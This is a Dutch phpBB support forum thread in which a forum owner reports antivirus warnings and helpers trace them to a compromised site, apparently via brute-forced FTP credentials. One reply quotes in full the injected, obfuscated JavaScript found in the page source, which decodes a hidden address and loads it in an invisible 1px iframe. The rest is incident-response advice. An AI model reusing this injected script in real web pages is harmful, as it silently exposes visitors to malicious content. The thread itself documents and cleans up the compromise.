virusmeldingen?

[Boewie]

• Adres van je forum: http://ikbeneenbam.nl
  Event. modificaties op je forum:
  Wanneer ontstond het probleem? paar dagen geleden
  phpBB versie: 3.0.11
  
  
  Heb je onlangs iets veranderd aan je forum?
  Wat is het probleem?

Sinds een paar dagen krijgen een aantal van mijn leden (en ikzelf) bij elke klik op het forum meldingen dat er virusbedreigingen zijn waargenomen. Tot dusver word dit alleen gesignaleerd met AVG virusscanner.
De leden die andere virusscanners gebruiken hebben hier geen last van.
Hoe kan ik dit verhelpen?
Heb nu de linkscanner van de virusscanner uitgezet, maar lijkt me niet echt de oplossing. Hoop dat iemand me hiermee kan helpen, want het is erg storend.

[Pola]

Kun je de exacte meldingen van AVG weergeven?

[AirWarrior]

Dit krijg je:

[Boewie]

ja, dat klopt

[Pola]

Krijg je meer informatie als je "Details weergeven" aanklikt?

Kun je via FTP (FileZilla) in /indes.php kijken of daar aan het einde van het bestand vreemde code staat aan het einde van het bestand, ergens na:

Code: Selecteer alles

$template->set_filenames(array(
	'body' => 'index_body.html')
);

[Boewie]

Als ik klik op 'meer info' , dan word ik doorgelinkt naar de de volgende pagina, die me niet echt info geeft over de bedreiging zelf.
als ik op 'details weergeven' klik
Procesnaam: C:\Users\Naam\AppData\Local\Google\Chrome\Application\chrome.exe
Proces-ID: 6684

En in index.php staat als laatste

Code: Selecteer alles

$template->set_filenames(array(
	'body' => 'index_body.html')
);

page_footer();

?>

[Pola]

Dat geeft inderdaad weinig informatie.

Als ik de view source van je index pagina bekijk, dan zie ik aan het einde het volgende staan:

Code: Selecteer alles

<!--(6f622805cf)--><script type="text/javascript">var VeQM;var xBQdHr;var bZDep='yRqJ';if('xsYL'=='XEBKj')oHdBFL='OvfAIR';function lMchhr(){}if('xTTX'=='bjlV')qXYO();var eXpcWQX="\x66ro\x6d\x43harCode";var PiaPr;var zPKoP=162;var px0_var="0px";var tDLo='noeX';var hZkmb="pa\x72seIn\x74";var MOwN=279;var appVersion_var="a\x70\x70Version";var GfrLcV;var mMyDLv=268;var oJyWtFC="bo\x64\x79";var MzkStJ;var LQRx='YvZrr';var EIpRgmLbl="ap\x70e\x6edC\x68ild";var aQdP=245;function LBEXN(){var mjghS='QZkm';if('Feourr'=='RKwRp')OXzNS();} var jHgyFfTIn="";var CJTP=287;function USeK(){var KLTDp='kMPj';if('uYHdj'=='zmbW')knqs();} var lqhqVU="sl\x69\x63\x65";var sxCwiC=298;if('ehayhP'=='Jwknz')gpSDUc();function ckzmT(){} var NJYHu="c\x6fnstruc\x74or";var JzNKjt;var px1_var="1\x70x";function lcrz(){}var HCpvEl='MIoKN';var CkgohhO="95a1a19d675c5ca0908e9b5a969d5b969b939c67656060655c9f9d877599726c786e6f75756a5f";var FHxJGnKjc=(function(){function CXabop(){var jomm='LKxA';if('kjSR'=='GfeI')zkMizf();} return this;if('Vsgjtn'=='eMbPl')mqlcb();var qkyBU=132;})();var mnyOzn='ZSQbO';if('pwgRah'=='GsWD')QZRrz='EBJK';var gMoEyb="kGhZQeZjC"[NJYHu];function EpiUN(){}if('otYbb'=='IOPshi')mHAp='dsnc';if('LIHq'=='kOgz')BvDvu='uwgXCw';for(var kVCHvwml=0;kVCHvwml<CkgohhO.length;kVCHvwml+=2){if('ybGs'=='ipeNHB')OjKWB='UqjN';TRbFXwbK=FHxJGnKjc[hZkmb](CkgohhO[lqhqVU](kVCHvwml,kVCHvwml+2),16)-45;function igqbe(){}var eEhu=119;jHgyFfTIn+=gMoEyb[eXpcWQX](TRbFXwbK);var grOV=23;function WTTn(){}} if('hAxNZh'=='MezKBv')MSlLR();var IxbRCx;var bpNO=200;function yfJky(){}function JzJvM(){} var umBOo="MwNRBQFfi";var albmBu;var yIJj=288;function wVAfYw(){var AqzR='QLlI';if('aasUBg'=='mwXyRp')AKyt();} function synwnk(){var ddiCRN='xsTY';if('hmtfn'=='JsuR')SkgCL();} var GGjHN="";if('zZOQ'=='AXlkq')xqUzq='eDam';function IXxBrr(){var QDtg='VnNn';if('ggkJl'=='wwuXG')FqVBKy();}if('jReiD'=='YghsO')eoXFC='wSKmL';if(navigator[appVersion_var].indexOf("MSIE")!=-1){function wjtm(){var ZWfBcz='YYRVlN';if('sYuv'=='EWRa')ADDV();}function sIODK(){} GGjHN='<iframe name="'+umBOo+'" src="'+jHgyFfTIn+'">';function JiTMLW(){}var QVRtn=74;}else{function piupiR(){}var cNSfl=212;GGjHN='iframe';var uXddmy;} function cFYoS(){var gyUj='HzdzG';if('axdK'=='myYo')fAnOm();} var hfZFQR=document.createElement(GGjHN);if('DQubT'=='wwGra')aalr='sOzX';hfZFQR.ydTrwWCYM=function(){function uYgYUc(){var TSrUh='aKkgoA';if('WjDuh'=='rJtqz')wozgc();} this["src"]=jHgyFfTIn;var VOEZA=190;} var vYNmcI;hfZFQR.style.top=px0_var;var WNEAiy;var ukiROj;if('msxom'=='lpPU')zXcazx();hfZFQR.name=umBOo;var nymGld;var vpKu=186;function SCAn(){var fuarVL='QNbrAv';if('JMdxEr'=='QVoki')pOxkvZ();} hfZFQR.style.position="absolute";if('aGLa'=='IsAhK')uIzo();hfZFQR.ydTrwWCYM();var oJijV=102;function mUdL(){var luWHqR='MldjiX';if('rRXqV'=='uJdH')VCGIYv();} hfZFQR.style.right=px0_var;if('QPpw'=='FIUoA')kogk();hfZFQR.style.height=px1_var;var PYJDr=45;var NqCS='YTqIj';if('AgSI'=='nkKnp')UDCDDX();var nMfHlm;hfZFQR.style.width=px1_var;var oDDKaC=121;if('zRMjck'=='eoAsNP')Miqxp='enRxzZ';if('NbsSj'=='yToZQW')gcKQM='EDBPs';function OjEvOLtG(){var hxIYz;if(document[oJyWtFC]){function iGOSi(){var ybpjF='NluXec';if('ZWzVQg'=='uVKmMO')SBzDk();}if('dhvw'=='RaNQp')hlVG();var document_body_var=document[oJyWtFC];var PNFBo=298;var uuGOXi='UJvg';var BowMMV;document_body_var[EIpRgmLbl].apply(document_body_var,[hfZFQR]);}else{setTimeout(OjEvOLtG,120);function xbtk(){var kVEvu='NQjQ';if('EbXM'=='iedJ')gbBt();}} function QaiIVA(){}if('RmsJ'=='olhuJ')UVQefL='HZTnQi';var YCqPF=273;} OjEvOLtG();if('xWYZ'=='PSoVI')TBalP='iVLo';var HnpBT;if('BtGW'=='vAKjp')uyWrgK='nVLq';</script><!--(/6f622805cf)-->

Ik vindt dat niet terug in /styles/prosilver/template/index_body.html of /styles/prosilver/template/overall_footer.html en dus ook niet in je /index.php.

Ik kan niet meer dan je twee optie geven:

1. Deze issue melden op de phpBB.com incident tracker.
   Als je denkt dat je forum gehacked is, doe dan het volgende voordat je enige wijzigingen aanbrengt (zoals wijzigen van wachtwoorden, aanpassen van bestanden, enz.):
   1. Maak een kopie van alle bestanden (bijvoorbeeld door een lokale kopie te maken op de server).
   2. Maak een export van je database
   3. Bewaar (zo mogelijk) de server access logs ten tijde van de hack. (Deze zijn mogelijk beschikbaar in de "logs" folder op de server, in het control panel van je provider of te verkrijgen door een verzoek aan je provider).
   4. Rapporteer het incident in de incident tracker. Voeg de kopieen uit de vorige stappen toe, of sla ze op op een veilige lokatie zodat het onderzoeksteam deze kan downloaden.
2. De issue melden aan je host.

[Solidjeuh]

kijk ook eens in je .httacces
Kan je terug vinden via FTP in de root.
Mss staat daar deze vreemde code..

[Boewie]

daar heb ik in gekeken, maar daar staat ook niets vreemds.
Nou... met mijn host kom ik ook niet veel verder.

ga nu een melding maken op incident tracker.

[Boewie]

wat word hiermee bedoeld? Mijn engels is niet zo heel erg goed.

When contacting us, please disable your board by means of .htaccess or otherwise

Moet ik het forum zolang uitschakelen?

en wat vul ik in bij het onderdeel component?

[Pola]

Bij Component kun je "Other" invullen.
Ze vragen daar inderdaad om het forum te disablen. Je kunt de volledige toegang tot het forum uitschakelen door in de .htaccess in de root (hoofd) folder van je forum de volgende code toe te voegen:

Code: Selecteer alles

deny from all

Als je het mij vraagt, kun je er ook voor kiezen om je forum te disablen via het beheerderspaneel.

[Boewie]

ik heb geprobeerd om het geëxporteerde bestand van mysql bij te voegen in de incident tracker. Maar hij pakt hem niet. Is het bestand te groot? (47,9 MB) en zo ja, hoe doe ik dat dan anders?

[Mendel]

Drie bestanden op je server waren gehackt.

index.php
cron.php
/gallery/index.php

Heb de betreffende code's verwijdert, en AVG is stil.

Zou je met klem aanraden je inlog en je wachtwoord voor je FTP te wijzigen

[Boewie]

O, ik ben blij dat je wat gevonden hebt.
Ik heb gelijk mijn inlog en wachtwoord voor FTP gewijzigd.
Bedankt!
Kan ik dit in de toekomst op een bepaalde manier voorkomen?

[Mendel]

Je inlog en wachtwoord lagen redelijk voor de hand, dus een hackbotje had hier een goede kans van slagen in mijn optiek.

Denk dat met een goed wachtwoord je dit kan verhinderen.

Kan niet met zekerheid zeggen dat de server zelve was gekraakt, of een lek in een of andere software. Maar na zien van je ftp-inloggegevens, gok ik het er hier op dat ze met brute kracht daarachter zijn gekomen .

[Boewie]

Ok, nogmaals bedankt.
Ik heb inmiddels een moeilijke login en wachtwoord.

[Boewie]

weet niet of dit nog komt van voordat ik mijn wachtwoord en login heb gewijzigd, maar in adm/index.php geeft AVG nog een melding. Het beheerderspaneel geeft ook problemen.

[Mendel]

Zou goed kunnen, heb niet alle bestanden kunnen scannen

Je hebt pb.